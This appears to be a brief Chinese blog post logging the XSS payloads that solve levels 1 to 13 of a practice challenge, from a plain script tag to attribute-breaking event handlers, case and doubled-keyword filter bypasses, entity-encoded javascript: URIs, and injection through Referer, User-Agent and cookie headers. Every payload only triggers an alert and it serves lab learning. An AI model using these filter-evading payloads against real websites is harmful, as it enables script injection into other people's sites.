xsschallenge(1-13)payload记录

第一关:

?name=<script>alert(/xss/)</script>

第二关:

?keyword="/onmouseover="alert(/xss/)"

第三关:

?keyword='/onmouseover='alert(/xss/)'

第四关:

?keyword="/onmouseover="alert(/xss/)"

第五关:

"><a href=javascript:alert(/xss/)>

第六关:

"/ONmouseover="alert(/xss/)"

第七关:

"/oonnmouseover="alert(/xss/)"

第八关:

javas&#x63;ript:alert(/xss/)

第九关:

javas&#x63;ript:alert('http://')

第十关:

?t_sort=" onmouseover="alert(/xss/)" type="button"

第十一关:

设置referer
" onmouseover="alert(/xss/)" type="button"

第十二关:

设置User-Agent:
" onmouseover="alert(/xss/)" type="button"

第十三关:

抓包-编辑cookie:
" onmouseover="alert(/xss/)" type="button"

 

posted @ 2021-02-03 22:01  划水ing  阅读(100)  评论(0)    收藏  举报
https://unpkg.com/live2d-widget-model-koharu@1.0.5/assets/koharu.model.json